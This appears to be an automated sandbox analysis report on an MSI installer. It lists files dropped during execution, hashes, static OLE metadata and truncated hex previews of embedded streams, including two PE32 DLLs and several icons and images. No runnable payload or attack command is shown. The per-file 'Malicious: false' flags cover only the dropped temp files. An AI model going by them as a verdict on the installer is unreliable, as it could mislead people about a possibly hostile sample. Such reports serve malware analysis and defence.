Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFC1FCEE7EEB6A95E1.TMP Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2302974559753648
Encrypted:	false
SSDEEP:	48:zuoruTI+CFXJ3T5NzZDlitSCzAECiCy9oXtSC/T/r:z/rBPT9lsEECPP
MD5:	EA2546F5D9B8AB8F0871F8E8E43247B9
SHA1:	AD27E11C8D2BF10524C34B795535425BA719EE8C
SHA-256:	5DC1755591E4CE84FEA3F5659D79765CF3C41B2EE28F47924735E83324FA80B9
SHA-512:	4D0626B0D74E65BB141F98DC1C8667484C47CCAEB77232C454E56255B70166191A7C3D60D57B237F30BC007503F56B340F6B929E530D21BA9F07B8711FAB58E9
Malicious:	false
Reputation:	unknown
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFEA366A85C3701123.TMP Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2302974559753648
Encrypted:	false
SSDEEP:	48:zuoruTI+CFXJ3T5NzZDlitSCzAECiCy9oXtSC/T/r:z/rBPT9lsEECPP
MD5:	EA2546F5D9B8AB8F0871F8E8E43247B9
SHA1:	AD27E11C8D2BF10524C34B795535425BA719EE8C
SHA-256:	5DC1755591E4CE84FEA3F5659D79765CF3C41B2EE28F47924735E83324FA80B9
SHA-512:	4D0626B0D74E65BB141F98DC1C8667484C47CCAEB77232C454E56255B70166191A7C3D60D57B237F30BC007503F56B340F6B929E530D21BA9F07B8711FAB58E9
Malicious:	false
Reputation:	unknown
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFEA4B32B6B36C9706.TMP Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Reputation:	unknown
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFED406FA6ACC3B517.TMP Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.07649775369411099
Encrypted:	false
SSDEEP:	6:2/9LG7iVCnLG7iVrKOzPLHKOzdSmQdzpDhmuystQVky6lWt/:2F0i8n0itFzDHFzV4RhlyuWt/
MD5:	9552583C60EE3DBD26A438F126CEB68A
SHA1:	4823EC420F96E4EEBEDC11F935C6E6EDBA5A311F
SHA-256:	B830AECBCC235B658CAD47FE6BD70AD3754A2FC033665978AA99662F292224FA
SHA-512:	F80A707755EC7FC1EA180CA49148D5C711271E64FE24CA683F650698A9189A11FB5DC9DDB879766D91304F3F36AD60FCD8ACFC10B78317BBC4B21B95AB4EE947
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.242581407332205
Encrypted:	false
SSDEEP:	12288:q9e1y4aQOQtZjTSx3L9rUKxXRgsM+8/fEpuJUp8FYVKS3H/o:ge1y4aQOQttTSxJjR
MD5:	BC9922512865831526408010F52F548E
SHA1:	17103527325C9F8B42959BFC08F6E041C4B295E5
SHA-256:	AEBD3268DDA9556BB28CC61508D40CFBBA9CEEB267D8B1AB04D6BE987E446E1D
SHA-512:	09FAEC111FB825CD486A57AD2195BA0A514A0D47B847DA6394E9B51F42A6F738B9404AACDB9D69A3F37DA91BF71C6B25E4180D105AC97A9AE9AE6C40B91EEEE9
Malicious:	false
Reputation:	unknown
Preview:	regfH...H...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm...................................................................................................................................................................................................................................................................................................................................................n...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	3.4037562610172944
Encrypted:	false
SSDEEP:	384:GLH5K5pPvRKgnVVeeDzey1NKZtj6T8Ghwd1NaU4Xb:+ZKsg/eeDzecNYtjHGhwdT4X
MD5:	452C6B336784C2F422689D7CAA5F8FFC
SHA1:	5171BF52B95299676FBCEBBF8A06D677A4E3E9CA
SHA-256:	559BC4D82D6F036B0BC3CDCF871449BCCD88D58B40D042E506FB371BEFB34470
SHA-512:	47BE35F57D2CD1C74384F0A7D9E5201E4EF703AD55C43EA3BEA9714E650178BF0813A3BC2373080D7BD3E2828AF3E8F2E50CA30ED9BFBC46055E5E083E31E972
Malicious:	false
Reputation:	unknown
Preview:	regfG...G...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm...................................................................................................................................................................................................................................................................................................................................................h...HvLE.N......G...........N.3..=..}.e..4...................... ..hbin................p.\..,..........nk,..O.......... ........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ..O.......... ........................... .......Z.......................Root........lf......Root....nk ..O...................................... ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {3E67FA5E-8FCD-475D-9775-2AF171CB93BE}, Number of Words: 10, Subject: Fichero, Author: VHETNiUaeF, Name of Creating Application: Advanced Installer 17.7 build 8a137570, Template: ;3082, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Entropy (8bit):	6.61649185405463
TrID:	Microsoft Windows Installer (77509/1) 52.18% Windows SDK Setup Transform Script (63028/2) 42.43% Generic OLE2 / Multistream Compound File (8008/1) 5.39%
File name:	C003I7GF0S8F920G600203.msi
File size:	3771904
MD5:	2917d9416ab9d90be57da089357592b3
SHA1:	4b6b50bffdcee566e37646f2d17666ef7a39863c
SHA256:	6ace3b241920068501ff00b28a7f8c04242325495eb85279f0a231158b5cd1a9
SHA512:	1354eacfeaa8b55bed80a9cc1e38a4cf130c25962415e7a7bb9cf8629a9e0f539a5b6f1519728a09d1aeea4eca5b2bfefcf1b412721d1c1004b3339e0a72932f
SSDEEP:	49152:myuYdA7thT62DmPCSuAnl2IsZqhgE6suyF9gW38znuA9oWVRT7BA:8YO7thIHXBgw8zzeCA
File Content Preview:	........................>...................:..................................................................................................................................................................................................................

File Icon


Icon Hash:	a2a0b496b2caca72

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "C003I7GF0S8F920G600203.msi"

Indicators
Has Summary Info:	True
Application Name:	Advanced Installer 17.7 build 8a137570
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Summary
Code Page:	1252
Title:	Installation Database
Subject:	Fichero
Author:	VHETNiUaeF
Keywords:	Installer, MSI, Database
Comments:
Template:	;3082
Last Saved By:
Revion Number:	{3E67FA5E-8FCD-475D-9775-2AF171CB93BE}
Last Printed:	2009-12-11 11:47:44.850000
Create Time:	2009-12-11 11:47:44.850000
Last Saved Time:	2020-09-18 14:06:51.913000
Number of Pages:	200
Number of Words:	10
Creating Application:	Advanced Installer 17.7 build 8a137570
Security:	0

Streams

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 492

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	492
Entropy:	4.30036852444
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . T . . . . . . . d . . . . . . . p . . . . . . . . . . . . . . . . . . . @ . . . # . . W z . . @ . . . # . . W z . . @ . . . . _ . . . . . . . . . . . . . . . . . . . . . . . . . . ' . . . { 3 E 6 7 F A 5 E - 8 F
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 bc 01 00 00 10 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 01 00 00 00 b4 00 00 00 09 00 00 00 bc 00 00 00 0f 00 00 00 ec 00 00 00 03 00 00 00 f4 00 00 00 04 00 00 00 04 01 00 00

Stream Path: \x17163\x16689\x18229\x15870\x18088, File Type: MS Windows icon resource - 1 icon, 16x16, 16 colors, Stream Size: 318

General
Stream Path:	\x17163\x16689\x18229\x15870\x18088
File Type:	MS Windows icon resource - 1 icon, 16x16, 16 colors
Stream Size:	318
Entropy:	2.03444158006
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . ( . . . . . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 00 01 00 01 00 10 10 10 00 00 00 00 00 28 01 00 00 16 00 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 04 00 00 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00 00 00 ff 00 ff 00 ff ff 00 00 ff ff ff 00 00 00

Stream Path: \x17163\x16689\x18229\x16318\x18483, File Type: MS Windows icon resource - 1 icon, 16x16, 16 colors, Stream Size: 318

General
Stream Path:	\x17163\x16689\x18229\x16318\x18483
File Type:	MS Windows icon resource - 1 icon, 16x16, 16 colors
Stream Size:	318
Entropy:	2.03693614652
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . ( . . . . . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 00 01 00 01 00 10 10 10 00 00 00 00 00 28 01 00 00 16 00 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 04 00 00 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00 00 00 ff 00 ff 00 ff ff 00 00 ff ff ff 00 00 00

Stream Path: \x17163\x16689\x18229\x16702\x16812\x17848\x16695\x17894\x16894\x17391, File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, Stream Size: 390304

General
Stream Path:	\x17163\x16689\x18229\x16702\x16812\x17848\x16695\x17894\x16894\x17391
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Stream Size:	390304
Entropy:	6.42232102372
Base64 Encoded:	True
Data ASCII:	M Z . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . L . ! T h i s p r o g r a m c a n n o t b e r u n i n D O S m o d e . . . . $ . . . . . . . j < R . . ] < . . ] < . . ] < . : 6 ? . # ] < . : 6 9 . . ] < . . , 8 . ! ] < . . , ? . 9 ] < . . , 9 . g ] < . : 6 8 . 7 ] < . : 6 : . / ] < . : 6 = . 1 ] < . . ] = . a \\ < . . / 5 . \| ] < . . / < . / ] < . . / . . / ] < . . ] . . / ] < . . / > . / ] < .
Data Raw:	4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00

Stream Path: \x17163\x16689\x18229\x16766\x17508\x16945\x18485, File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x59, frames 3, Stream Size: 2818

General
Stream Path:	\x17163\x16689\x18229\x16766\x17508\x16945\x18485
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x59, frames 3
Stream Size:	2818
Entropy:	7.55703063679
Base64 Encoded:	True
Data ASCII:	. . . . . . J F I F . . . . . . . . . . . . . C . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . ' " , # . . ( 7 ) , 0 1 4 4 4 . ' 9 = 8 2 < . 3 4 2 . . . C . . . . . . . . . . . 2 ! . ! 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 . . . . . . ; . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . } . . . . . . . . ! 1 A . . Q a . " q . 2 . . . . #
Data Raw:	ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32

Stream Path: \x17163\x16689\x18229\x16830\x16880\x17199\x17329\x17764\x17589\x18490, File Type: MS Windows icon resource - 3 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel, Stream Size: 2862

General
Stream Path:	\x17163\x16689\x18229\x16830\x16880\x17199\x17329\x17764\x17589\x18490
File Type:	MS Windows icon resource - 3 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
Stream Size:	2862
Entropy:	3.16043065194
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . ( . . . 6 . . . . . . . . . . . h . . . ^ . . . . . . . . . . h . . . . . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w v . . . . . " " " " " o . . " " " " " o . . w w w " " . . . . . . " / . . . .
Data Raw:	00 00 01 00 03 00 10 10 10 00 00 00 04 00 28 01 00 00 36 00 00 00 10 10 00 00 00 00 08 00 68 05 00 00 5e 01 00 00 10 10 00 00 00 00 20 00 68 04 00 00 c6 06 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 04 00 00 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 80 80 80 00 c0 c0

Stream Path: \x17163\x16689\x18229\x16830\x17458\x17395\x17896\x18476, File Type: MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32, Stream Size: 2998

General
Stream Path:	\x17163\x16689\x18229\x16830\x17458\x17395\x17896\x18476
File Type:	MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32
Stream Size:	2998
Entropy:	4.35906224297
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . ( . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w . . . . . . . . . . . . . . . . { . . . . . . . . . . . . . . . . . . p . . . . . . . . . . x . { . w p . . . . . . . . . . . . { . w . . . . . . . .
Data Raw:	00 00 01 00 02 00 20 20 10 00 00 00 00 00 e8 02 00 00 26 00 00 00 20 20 00 00 00 00 00 00 a8 08 00 00 0e 03 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00

Stream Path: \x17163\x16689\x18229\x16830\x17848\x17207\x17574\x18481, File Type: MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32, Stream Size: 2998

General
Stream Path:	\x17163\x16689\x18229\x16830\x17848\x17207\x17574\x18481
File Type:	MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32
Stream Size:	2998
Entropy:	4.29856879699
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . ( . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w . . . . . . . . . . . . . . . . { . . . . . . . . . . . . . . . . . . p . . . . . . . . . . x . { . w p . . . . . . . . . . . . { . w . . . . . . . .
Data Raw:	00 00 01 00 02 00 20 20 10 00 00 00 00 00 e8 02 00 00 26 00 00 00 20 20 00 00 00 00 00 00 a8 08 00 00 0e 03 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00

Stream Path: \x17163\x16689\x18229\x16894\x16684\x17583\x18474, File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 500x316, frames 3, Stream Size: 11791

General
Stream Path:	\x17163\x16689\x18229\x16894\x16684\x17583\x18474
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 500x316, frames 3
Stream Size:	11791
Entropy:	7.71486251579
Base64 Encoded:	True
Data ASCII:	. . . . . . J F I F . . . . . . . . . . . . . C . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . s .
Data Raw:	ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03 04 04 04 04 05 09 06 05 05 05 05 0b 08 08 06 09 0d 0b 0d 0d 0d 0b 0c 0c 0e 10 14 11 0e 0f 13 0f 0c 0c 12 18 12 13 15 16 17 17 17 0e 11 19 1b 19 16 1a 14 16 17 16 ff db 00 43 01 04 04 04 05 05 05 0a 06 06 0a 16 0f 0c 0f 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16

Stream Path: \x17163\x16689\x18229\x16958\x16827\x16687\x17200\x18470, File Type: MS Windows icon resource - 1 icon, 32x32, 16 colors, Stream Size: 766

General
Stream Path:	\x17163\x16689\x18229\x16958\x16827\x16687\x17200\x18470
File Type:	MS Windows icon resource - 1 icon, 32x32, 16 colors
Stream Size:	766
Entropy:	3.3484862649
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . ( . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 3 1 . . . . . . . . . . . . 3 3 2 3 3 3 3 3 3 3 3 3 3 3 3 . 3 3 $ D D D D D D D D D D D @ 1 . 2 D D D D D D D D D D D D D . . 2 D D D D D D @ D D D D D D C . 2 D D D D D D 3 4 D D D D D C . 2 D D D D D @ 3 0 D D D D D . . 3 $ D D D D D 3 4 D D D D D 1 . 3 $
Data Raw:	00 00 01 00 01 00 20 20 10 00 00 00 00 00 e8 02 00 00 16 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 c0 c0 00 80 80 80 00 00 80 80 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 33

Stream Path: \x17163\x16689\x18229\x17214\x17009\x18482, File Type: MS Windows icon resource - 2 icons, 32x32, 16 colors, 16x16, 16 colors, Stream Size: 1078

General
Stream Path:	\x17163\x16689\x18229\x17214\x17009\x18482
File Type:	MS Windows icon resource - 2 icons, 32x32, 16 colors, 16x16, 16 colors
Stream Size:	1078
Entropy:	2.86422695486
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . & . . . . . . . . . . . ( . . . . . . . ( . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . w p . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . p . . . . . . . . . . w w . . . w w . . . . . .
Data Raw:	00 00 01 00 02 00 20 20 10 00 00 00 00 00 e8 02 00 00 26 00 00 00 10 10 10 00 00 00 00 00 28 01 00 00 0e 03 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 80 80 80 00 c0 c0 c0 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00

Stream Path: \x17163\x16689\x18229\x17214\x17841\x17207\x17574\x18481, File Type: MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32, Stream Size: 2998

General
Stream Path:	\x17163\x16689\x18229\x17214\x17841\x17207\x17574\x18481
File Type:	MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32
Stream Size:	2998
Entropy:	4.40653521205
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . ( . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . { . . . . . . . . . . . . . . . w . . . . . . . . . . p . . x . . . . w . . . . . . . . x . . . w . . w . . . . . . . p . . x x . . w ~ . . . . . . . . x . . . . . ~ . . . . . . .
Data Raw:	00 00 01 00 02 00 20 20 10 00 00 00 00 00 e8 02 00 00 26 00 00 00 20 20 00 00 00 00 00 00 a8 08 00 00 0e 03 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00

Stream Path: \x17163\x16689\x18229\x17342\x15477\x15405\x15214\x16894\x17391\x14463, File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, Stream Size: 3181056

General
Stream Path:	\x17163\x16689\x18229\x17342\x15477\x15405\x15214\x16894\x17391\x14463
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Stream Size:	3181056
Entropy:	6.6230052615
Base64 Encoded:	True
Data ASCII:	M Z P . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . L . ! . . T h i s p r o g r a m m u s t b e r u n u n d e r W i n 3 2 . . $ 7 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00

Stream Path: \x17163\x16689\x18229\x17790\x17448\x18034\x16812\x18482, File Type: MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32, Stream Size: 2998

General
Stream Path:	\x17163\x16689\x18229\x17790\x17448\x18034\x16812\x18482
File Type:	MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32
Stream Size:	2998
Entropy:	4.92283562852
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . ( . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . w . . . . . . w w . . . . . . . . . . . . w . f . w . . . . . . w . . . . . v v f . w . . . . . . . . . . . n f f l . w . . . .
Data Raw:	00 00 01 00 02 00 20 20 10 00 00 00 00 00 e8 02 00 00 26 00 00 00 20 20 00 00 00 00 00 00 a8 08 00 00 0e 03 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00

